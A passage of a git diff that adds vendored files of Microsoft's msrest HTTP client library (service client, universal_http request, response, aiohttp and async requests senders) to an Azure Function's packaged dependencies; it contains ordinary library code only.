RequestsPatchSession(), # Support deprecated operation config at the session level + self.config.http_logger_policy # HTTP request/response log + ] # type: List[Union[HTTPPolicy, SansIOHTTPPolicy]] + if creds: + if isinstance(creds, (HTTPPolicy, SansIOHTTPPolicy)): + policies.insert(1, creds) + else: + # Assume this is the old credentials class, and then requests. Wrap it. 
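+ # (A sketch of the resulting order with the default config:
+ # [user_agent_policy, <credentials policy>, RequestsPatchSession(), http_logger_policy],
+ # i.e. credentials are applied right after the UserAgent policy.)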
+ policies.insert(1, RequestsCredentialsPolicy(creds)) # Set credentials for requests based session
+
+ return Pipeline(
+ policies,
+ PipelineRequestsHTTPSender(RequestsHTTPSender(self.config)) # Send HTTP request using requests
+ )
+
+ def __enter__(self):
+ # type: () -> ServiceClient
+ self.config.keep_alive = True
+ self.config.pipeline.__enter__()
+ return self
+
+ def __exit__(self, *exc_details):
+ self.config.pipeline.__exit__(*exc_details)
+ self.config.keep_alive = False
+
+ def close(self):
+ # type: () -> None
+ """Close the pipeline if keep_alive is True.
+ """
+ self.config.pipeline.__exit__() # type: ignore
+
+ def send_formdata(self, request, headers=None, content=None, **config):
+ """Send data as a multipart form-data request.
+ We only deal with file-like objects or strings at this point.
+ The request is not yet streamed.
+
+ This method is deprecated and shouldn't be used anymore.
+
+ :param ClientRequest request: The request object to be sent.
+ :param dict headers: Any headers to add to the request.
+ :param dict content: Dictionary of the fields of the formdata.
+ :param config: Any specific config overrides.
+ """
+ request.headers = headers
+ request.add_formdata(content)
+ return self.send(request, **config)
+
+ def send(self, request, headers=None, content=None, **kwargs):
+ """Prepare and send request object according to configuration.
+
+ :param ClientRequest request: The request object to be sent.
+ :param dict headers: Any headers to add to the request.
+ :param content: Any body data to add to the request.
+ :param config: Any specific config overrides.
+ """
+ # "content" and "headers" are deprecated, only old SDK
+ if headers:
+ request.headers.update(headers)
+ if not request.files and request.data is None and content is not None:
+ request.add_content(content)
+ # End of deprecation
+
+ response = None
+ kwargs.setdefault('stream', True)
+ try:
+ pipeline_response = self.config.pipeline.run(request, **kwargs)
+ # Too many things expect this method to return a "requests.Response"
+ # to break that in a compatible release.
+ # Also, to be pragmatic, in the "sync" world "requests" rules anyway.
+ # However, attach the Universal HTTP response
+ # to get the streaming generator.
+ response = pipeline_response.http_response.internal_response
+ response._universal_http_response = pipeline_response.http_response
+ response.context = pipeline_response.context
+ return response
+ finally:
+ self._close_local_session_if_necessary(response, kwargs['stream'])
+
+ def _close_local_session_if_necessary(self, response, stream):
+ # This is a local session; close it if nothing still needs it.
+ if not self.config.keep_alive and (not response or not stream):
+ self.config.pipeline._sender.driver.session.close()
+
+ def stream_download(self, data, callback):
+ # type: (Union[requests.Response, ClientResponse], Callable) -> Iterator[bytes]
+ """Generator for streaming request body data.
+
+ :param data: A response object to be streamed.
+ :param callback: Custom callback for monitoring progress.
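+
+ A usage sketch (assuming "client" is a configured ServiceClient and
+ "response" came from client.send(request, stream=True); handle_chunk
+ is a hypothetical consumer):
+
+ for chunk in client.stream_download(response, callback=None):
+ handle_chunk(chunk)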
+ """ + block = self.config.connection.data_block_size + try: + # Assume this is ClientResponse, which it should be if backward compat was not important + return cast(ClientResponse, data).stream_download(block, callback) + except AttributeError: + try: + # Assume this is the patched requests.Response from "send" + return data._universal_http_response.stream_download(block, callback) # type: ignore + except AttributeError: + # Assume this is a raw requests.Response + from .universal_http.requests import RequestsClientResponse + response = RequestsClientResponse(None, data) + return response.stream_download(block, callback) + + def add_header(self, header, value): + # type: (str, str) -> None + """Add a persistent header - this header will be applied to all + requests sent during the current client session. + + .. deprecated:: 0.5.0 + Use config.headers instead + + :param str header: The header name. + :param str value: The header value. + """ + warnings.warn("Private attribute _client.add_header is deprecated. Use config.headers instead.", + DeprecationWarning) + self.config.headers[header] = value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__init__.py new file mode 100644 index 0000000..1811364 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__init__.py @@ -0,0 +1,460 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+# +# -------------------------------------------------------------------------- +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import abc +try: + import configparser + from configparser import NoOptionError +except ImportError: + import ConfigParser as configparser # type: ignore + from ConfigParser import NoOptionError # type: ignore +import json +import logging +import os.path +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse +import xml.etree.ElementTree as ET + +from typing import TYPE_CHECKING, Generic, TypeVar, cast, IO, List, Union, Any, Mapping, Dict, Optional, Tuple, Callable, Iterator, MutableMapping # pylint: disable=unused-import + +HTTPResponseType = TypeVar("HTTPResponseType", bound='HTTPClientResponse') + +# This file is NOT using any "requests" HTTP implementation +# However, the CaseInsensitiveDict is handy. +# If one day we reach the point where "requests" can be skip totally, +# might provide our own implementation +from requests.structures import CaseInsensitiveDict + +from ..exceptions import ClientRequestError, raise_with_traceback + +if TYPE_CHECKING: + from ..serialization import Model # pylint: disable=unused-import + + +_LOGGER = logging.getLogger(__name__) + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore + +try: + from contextlib import AbstractContextManager # type: ignore +except ImportError: # Python <= 3.5 + class AbstractContextManager(object): # type: ignore + def __enter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + def __exit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + +class HTTPSender(AbstractContextManager, ABC): + """An http sender ABC. + """ + + @abc.abstractmethod + def send(self, request, **config): + # type: (ClientRequest, Any) -> ClientResponse + """Send the request using this HTTP sender. + """ + pass + + +class HTTPSenderConfiguration(object): + """HTTP sender configuration. + + This is composed of generic HTTP configuration, and could be use as a common + HTTP configuration format. + + :param str filepath: Path to existing config file (optional). + """ + + def __init__(self, filepath=None): + # Communication configuration + self.connection = ClientConnection() + + # Headers (sent with every requests) + self.headers = {} # type: Dict[str, str] + + # ProxyConfiguration + self.proxies = ClientProxies() + + # Redirect configuration + self.redirect_policy = ClientRedirectPolicy() + + self._config = configparser.ConfigParser() + self._config.optionxform = str # type: ignore + + if filepath: + self.load(filepath) + + def _clear_config(self): + # type: () -> None + """Clearout config object in memory.""" + for section in self._config.sections(): + self._config.remove_section(section) + + def save(self, filepath): + # type: (str) -> None + """Save current configuration to file. + + :param str filepath: Path to file where settings will be saved. + :raises: ValueError if supplied filepath cannot be written to. 
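+
+ A round-trip sketch (the file path is illustrative):
+
+ config = HTTPSenderConfiguration()
+ config.connection.timeout = 100
+ config.save("./sender.cfg")
+ config.load("./sender.cfg") # restores the same settings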
+ """ + sections = [ + "Connection", + "Proxies", + "RedirectPolicy"] + for section in sections: + self._config.add_section(section) + + self._config.set("Connection", "timeout", self.connection.timeout) + self._config.set("Connection", "verify", self.connection.verify) + self._config.set("Connection", "cert", self.connection.cert) + + self._config.set("Proxies", "proxies", self.proxies.proxies) + self._config.set("Proxies", "env_settings", + self.proxies.use_env_settings) + + self._config.set("RedirectPolicy", "allow", self.redirect_policy.allow) + self._config.set("RedirectPolicy", "max_redirects", + self.redirect_policy.max_redirects) + + try: + with open(filepath, 'w') as configfile: + self._config.write(configfile) + except (KeyError, EnvironmentError): + error = "Supplied config filepath invalid." + raise_with_traceback(ValueError, error) + finally: + self._clear_config() + + def load(self, filepath): + # type: (str) -> None + """Load configuration from existing file. + + :param str filepath: Path to existing config file. + :raises: ValueError if supplied config file is invalid. + """ + try: + self._config.read(filepath) + import ast + self.connection.timeout = \ + self._config.getint("Connection", "timeout") + self.connection.verify = \ + self._config.getboolean("Connection", "verify") + self.connection.cert = \ + self._config.get("Connection", "cert") + + self.proxies.proxies = \ + ast.literal_eval(self._config.get("Proxies", "proxies")) + self.proxies.use_env_settings = \ + self._config.getboolean("Proxies", "env_settings") + + self.redirect_policy.allow = \ + self._config.getboolean("RedirectPolicy", "allow") + self.redirect_policy.max_redirects = \ + self._config.getint("RedirectPolicy", "max_redirects") + + except (ValueError, EnvironmentError, NoOptionError): + error = "Supplied config file incompatible." + raise_with_traceback(ValueError, error) + finally: + self._clear_config() + + +class ClientRequest(object): + """Represents a HTTP request. + + URL can be given without query parameters, to be added later using "format_parameters". + + Instance can be created without data, to be added later using "add_content" + + Instance can be created without files, to be added later using "add_formdata" + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: At least complete scheme/host/path + :param dict[str,str] headers: HTTP headers + :param files: Files list. + :param data: Body to be sent. + :type data: bytes or str. + """ + def __init__(self, method, url, headers=None, files=None, data=None): + # type: (str, str, Mapping[str, str], Any, Any) -> None + self.method = method + self.url = url + self.headers = CaseInsensitiveDict(headers) + self.files = files + self.data = data + + def __repr__(self): + return '' % (self.method) + + @property + def body(self): + """Alias to data.""" + return self.data + + @body.setter + def body(self, value): + self.data = value + + def format_parameters(self, params): + # type: (Dict[str, str]) -> None + """Format parameters into a valid query string. + It's assumed all parameters have already been quoted as + valid URL strings. + + :param dict params: A dictionary of parameters. + """ + query = urlparse(self.url).query + if query: + self.url = self.url.partition('?')[0] + existing_params = { + p[0]: p[-1] + for p in [p.partition('=') for p in query.split('&')] + } + params.update(existing_params) + query_params = ["{}={}".format(k, v) for k, v in params.items()] + query = '?' 
+ '&'.join(query_params) + self.url = self.url + query + + def add_content(self, data): + # type: (Optional[Union[Dict[str, Any], ET.Element]]) -> None + """Add a body to the request. + + :param data: Request body data, can be a json serializable + object (e.g. dictionary) or a generator (e.g. file data). + """ + if data is None: + return + + if isinstance(data, ET.Element): + bytes_data = ET.tostring(data, encoding="utf8") + self.headers['Content-Length'] = str(len(bytes_data)) + self.data = bytes_data + return + + # By default, assume JSON + try: + self.data = json.dumps(data) + self.headers['Content-Length'] = str(len(self.data)) + except TypeError: + self.data = data + + @staticmethod + def _format_data(data): + # type: (Union[str, IO]) -> Union[Tuple[None, str], Tuple[Optional[str], IO, str]] + """Format field data according to whether it is a stream or + a string for a form-data request. + + :param data: The request field data. + :type data: str or file-like object. + """ + if hasattr(data, 'read'): + data = cast(IO, data) + data_name = None + try: + if data.name[0] != '<' and data.name[-1] != '>': + data_name = os.path.basename(data.name) + except (AttributeError, TypeError): + pass + return (data_name, data, "application/octet-stream") + return (None, cast(str, data)) + + def add_formdata(self, content=None): + # type: (Optional[Dict[str, str]]) -> None + """Add data as a multipart form-data request to the request. + + We only deal with file-like objects or strings at this point. + The requests is not yet streamed. + + :param dict headers: Any headers to add to the request. + :param dict content: Dictionary of the fields of the formdata. + """ + if content is None: + content = {} + content_type = self.headers.pop('Content-Type', None) if self.headers else None + + if content_type and content_type.lower() == 'application/x-www-form-urlencoded': + # Do NOT use "add_content" that assumes input is JSON + self.data = {f: d for f, d in content.items() if d is not None} + else: # Assume "multipart/form-data" + self.files = {f: self._format_data(d) for f, d in content.items() if d is not None} + +class HTTPClientResponse(object): + """Represent a HTTP response. + + No body is defined here on purpose, since async pipeline + will provide async ways to access the body + + You have two different types of body: + - Full in-memory using "body" as bytes + """ + def __init__(self, request, internal_response): + # type: (ClientRequest, Any) -> None + self.request = request + self.internal_response = internal_response + self.status_code = None # type: Optional[int] + self.headers = {} # type: MutableMapping[str, str] + self.reason = None # type: Optional[str] + + def body(self): + # type: () -> bytes + """Return the whole body as bytes in memory. + """ + pass + + def text(self, encoding=None): + # type: (str) -> str + """Return the whole body as a string. + + :param str encoding: The encoding to apply. If None, use "utf-8-sig". + Implementation can be smarter if they want (using headers). + """ + return self.body().decode(encoding or "utf-8-sig") + + def raise_for_status(self): + """Raise for status. Should be overridden, but basic implementation provided. + """ + if self.status_code >= 400: + raise ClientRequestError("Received status code {}".format(self.status_code)) + + +class ClientResponse(HTTPClientResponse): + + def stream_download(self, chunk_size=None, callback=None): + # type: (Optional[int], Optional[Callable]) -> Iterator[bytes] + """Generator for streaming request body data. 
+ + Should be implemented by sub-classes if streaming download + is supported. + + :param callback: Custom callback for monitoring progress. + :param int chunk_size: + """ + pass + + +class ClientRedirectPolicy(object): + """Redirect configuration settings. + """ + + def __init__(self): + self.allow = True + self.max_redirects = 30 + + def __bool__(self): + # type: () -> bool + """Whether redirects are allowed.""" + return self.allow + + def __call__(self): + # type: () -> int + """Return configuration to be applied to connection.""" + debug = "Configuring redirects: allow=%r, max=%r" + _LOGGER.debug(debug, self.allow, self.max_redirects) + return self.max_redirects + + +class ClientProxies(object): + """Proxy configuration settings. + Proxies can also be configured using HTTP_PROXY and HTTPS_PROXY + environment variables, in which case set use_env_settings to True. + """ + + def __init__(self): + self.proxies = {} + self.use_env_settings = True + + def __call__(self): + # type: () -> Dict[str, str] + """Return configuration to be applied to connection.""" + proxy_string = "\n".join( + [" {}: {}".format(k, v) for k, v in self.proxies.items()]) + + _LOGGER.debug("Configuring proxies: %r", proxy_string) + debug = "Evaluate proxies against ENV settings: %r" + _LOGGER.debug(debug, self.use_env_settings) + return self.proxies + + def add(self, protocol, proxy_url): + # type: (str, str) -> None + """Add proxy. + + :param str protocol: Protocol for which proxy is to be applied. Can + be 'http', 'https', etc. Can also include host. + :param str proxy_url: The proxy URL. Where basic auth is required, + use the format: http://user:password@host + """ + self.proxies[protocol] = proxy_url + + +class ClientConnection(object): + """Request connection configuration settings. 
+ """ + + def __init__(self): + self.timeout = 100 + self.verify = True + self.cert = None + self.data_block_size = 4096 + + def __call__(self): + # type: () -> Dict[str, Union[str, int]] + """Return configuration to be applied to connection.""" + debug = "Configuring request: timeout=%r, verify=%r, cert=%r" + _LOGGER.debug(debug, self.timeout, self.verify, self.cert) + return {'timeout': self.timeout, + 'verify': self.verify, + 'cert': self.cert} + + +__all__ = [ + 'ClientRequest', + 'ClientResponse', + 'HTTPSender', + # Generic HTTP configuration + 'HTTPSenderConfiguration', + 'ClientRedirectPolicy', + 'ClientProxies', + 'ClientConnection' +] + +try: + from .async_abc import AsyncHTTPSender, AsyncClientResponse # pylint: disable=unused-import + from .async_abc import __all__ as _async_all + __all__ += _async_all +except SyntaxError: # Python 2 + pass +except ImportError: # pyinstaller won't include Py3 files in Py2.7 mode + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..c3c217e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc new file mode 100644 index 0000000..e3b5985 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_abc.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_abc.cpython-39.pyc new file mode 100644 index 0000000..b6ec94d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_abc.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_requests.cpython-39.pyc new file mode 100644 index 0000000..0093ddf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_requests.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/requests.cpython-39.pyc new file mode 100644 index 0000000..5617016 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/requests.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/aiohttp.py new file mode 100644 index 0000000..7ec55bf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/aiohttp.py @@ -0,0 +1,101 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Any, Callable, AsyncIterator, Optional + +import aiohttp +from multidict import CIMultiDict + +from . import AsyncHTTPSender, ClientRequest, AsyncClientResponse + +# Matching requests, because why not? +CONTENT_CHUNK_SIZE = 10 * 1024 + + +class AioHTTPSender(AsyncHTTPSender): + """AioHttp HTTP sender implementation. + """ + + def __init__(self, *, loop=None): + self._session = aiohttp.ClientSession(loop=loop) + + async def __aenter__(self): + await self._session.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self._session.__aexit__(*exc_details) + + async def send(self, request: ClientRequest, **config: Any) -> AsyncClientResponse: + """Send the request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + pass stream=True to avoid this behavior. + """ + result = await self._session.request( + request.method, + request.url, + **config + ) + response = AioHttpClientResponse(request, result) + if not config.get("stream", False): + await response.load_body() + return response + + +class AioHttpClientResponse(AsyncClientResponse): + def __init__(self, request: ClientRequest, aiohttp_response: aiohttp.ClientResponse) -> None: + super(AioHttpClientResponse, self).__init__(request, aiohttp_response) + # https://aiohttp.readthedocs.io/en/stable/client_reference.html#aiohttp.ClientResponse + self.status_code = aiohttp_response.status + self.headers = CIMultiDict(aiohttp_response.headers) + self.reason = aiohttp_response.reason + self._body = None + + def body(self) -> bytes: + """Return the whole body as bytes in memory. + """ + if not self._body: + raise ValueError("Body is not available. 
Call async method load_body, or do your call with stream=False.")
+        return self._body
+
+    async def load_body(self) -> None:
+        """Load the body in memory, so it can be accessed from sync methods."""
+        self._body = await self.internal_response.read()
+
+    def raise_for_status(self):
+        self.internal_response.raise_for_status()
+
+    def stream_download(self, chunk_size: Optional[int] = None, callback: Optional[Callable] = None) -> AsyncIterator[bytes]:
+        """Generator for streaming request body data.
+        """
+        chunk_size = chunk_size or CONTENT_CHUNK_SIZE
+        async def async_gen(resp):
+            while True:
+                chunk = await resp.content.read(chunk_size)
+                if not chunk:
+                    break
+                if callback and callable(callback):
+                    callback(chunk, resp)
+                yield chunk
+        return async_gen(self.internal_response)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_abc.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_abc.py
new file mode 100644
index 0000000..93c33e9
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_abc.py
@@ -0,0 +1,90 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+import abc
+
+from typing import Any, List, Union, Callable, AsyncIterator, Optional
+
+try:
+    from contextlib import AbstractAsyncContextManager  # type: ignore
+except ImportError:  # Python <= 3.7
+    class AbstractAsyncContextManager(object):  # type: ignore
+        async def __aenter__(self):
+            """Return `self` upon entering the runtime context."""
+            return self
+
+        @abc.abstractmethod
+        async def __aexit__(self, exc_type, exc_value, traceback):
+            """Raise any exception triggered within the runtime context."""
+            return None
+
+from . import ClientRequest, HTTPClientResponse
+
+
+class AsyncClientResponse(HTTPClientResponse):
+
+    def stream_download(self, chunk_size: Optional[int] = None, callback: Optional[Callable] = None) -> AsyncIterator[bytes]:
+        """Generator for streaming request body data.
+
+        Should be implemented by sub-classes if streaming download
+        is supported.
+
+        :param callback: Custom callback for monitoring progress.
+ :param int chunk_size: + """ + pass + + +class AsyncHTTPSender(AbstractAsyncContextManager, abc.ABC): + """An http sender ABC. + """ + + @abc.abstractmethod + async def send(self, request: ClientRequest, **config: Any) -> AsyncClientResponse: + """Send the request using this HTTP sender. + """ + pass + + def build_context(self) -> Any: + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + def __enter__(self): + raise TypeError("Use 'async with' instead") + + def __exit__(self, exc_type, exc_val, exc_tb): + # __exit__ should exist in pair with __enter__ but never executed + pass # pragma: no cover + + +__all__ = [ + 'AsyncHTTPSender', + 'AsyncClientResponse' +] \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_requests.py new file mode 100644 index 0000000..f02b276 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_requests.py @@ -0,0 +1,240 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +import functools +import logging +from typing import Any, Callable, Optional, AsyncIterator as AsyncIteratorType + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback) +from . 
import AsyncHTTPSender, ClientRequest, AsyncClientResponse
+from .requests import (
+    BasicRequestsHTTPSender,
+    RequestsHTTPSender,
+    HTTPRequestsClientResponse
+)
+
+
+_LOGGER = logging.getLogger(__name__)
+
+
+class AsyncBasicRequestsHTTPSender(BasicRequestsHTTPSender, AsyncHTTPSender):  # type: ignore
+
+    async def __aenter__(self):
+        return super(AsyncBasicRequestsHTTPSender, self).__enter__()
+
+    async def __aexit__(self, *exc_details):  # pylint: disable=arguments-differ
+        return super(AsyncBasicRequestsHTTPSender, self).__exit__()
+
+    async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse:  # type: ignore
+        """Send the request using this HTTP sender.
+        """
+        # It's not recommended to provide your own session; this is mostly
+        # to enable some legacy code to plug in correctly
+        session = kwargs.pop('session', self.session)
+
+        loop = kwargs.get("loop", asyncio.get_event_loop())
+        future = loop.run_in_executor(
+            None,
+            functools.partial(
+                session.request,
+                request.method,
+                request.url,
+                **kwargs
+            )
+        )
+        try:
+            return AsyncRequestsClientResponse(
+                request,
+                await future
+            )
+        except requests.RequestException as err:
+            msg = "Error occurred in request."
+            raise_with_traceback(ClientRequestError, msg, err)
+
+class AsyncRequestsHTTPSender(AsyncBasicRequestsHTTPSender, RequestsHTTPSender):  # type: ignore
+
+    async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse:  # type: ignore
+        """Send the request using this HTTP sender.
+        """
+        requests_kwargs = self._configure_send(request, **kwargs)
+        return await super(AsyncRequestsHTTPSender, self).send(request, **requests_kwargs)
+
+
+class _MsrestStopIteration(Exception):
+    pass
+
+def _msrest_next(iterator):
+    """To avoid:
+    TypeError: StopIteration interacts badly with generators and cannot be raised into a Future
+    """
+    try:
+        return next(iterator)
+    except StopIteration:
+        raise _MsrestStopIteration()
+
+class StreamDownloadGenerator(AsyncIterator):
+
+    def __init__(self, response: requests.Response, user_callback: Optional[Callable] = None, block: Optional[int] = None) -> None:
+        self.response = response
+        self.block = block or CONTENT_CHUNK_SIZE
+        self.user_callback = user_callback
+        self.iter_content_func = self.response.iter_content(self.block)
+
+    async def __anext__(self):
+        loop = asyncio.get_event_loop()
+        try:
+            chunk = await loop.run_in_executor(
+                None,
+                _msrest_next,
+                self.iter_content_func,
+            )
+            if not chunk:
+                raise _MsrestStopIteration()
+            if self.user_callback and callable(self.user_callback):
+                self.user_callback(chunk, self.response)
+            return chunk
+        except _MsrestStopIteration:
+            self.response.close()
+            raise StopAsyncIteration()
+        except Exception as err:
+            _LOGGER.warning("Unable to stream download: %s", err)
+            self.response.close()
+            raise
+
+class AsyncRequestsClientResponse(AsyncClientResponse, HTTPRequestsClientResponse):
+
+    def stream_download(self, chunk_size: Optional[int] = None, callback: Optional[Callable] = None) -> AsyncIteratorType[bytes]:
+        """Generator for streaming request body data.
+
+        :param callback: Custom callback for monitoring progress.
+ :param int chunk_size: + """ + return StreamDownloadGenerator( + self.internal_response, + callback, + chunk_size + ) + + +# Trio support +try: + import trio + + class TrioStreamDownloadGenerator(AsyncIterator): + + def __init__(self, response: requests.Response, user_callback: Optional[Callable] = None, block: Optional[int] = None) -> None: + self.response = response + self.block = block or CONTENT_CHUNK_SIZE + self.user_callback = user_callback + self.iter_content_func = self.response.iter_content(self.block) + + async def __anext__(self): + try: + chunk = await trio.to_thread.run_sync( + _msrest_next, + self.iter_content_func, + ) + if not chunk: + raise _MsrestStopIteration() + if self.user_callback and callable(self.user_callback): + self.user_callback(chunk, self.response) + return chunk + except _MsrestStopIteration: + self.response.close() + raise StopAsyncIteration() + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + self.response.close() + raise + + class TrioAsyncRequestsClientResponse(AsyncClientResponse, HTTPRequestsClientResponse): + + def stream_download(self, chunk_size: Optional[int] = None, callback: 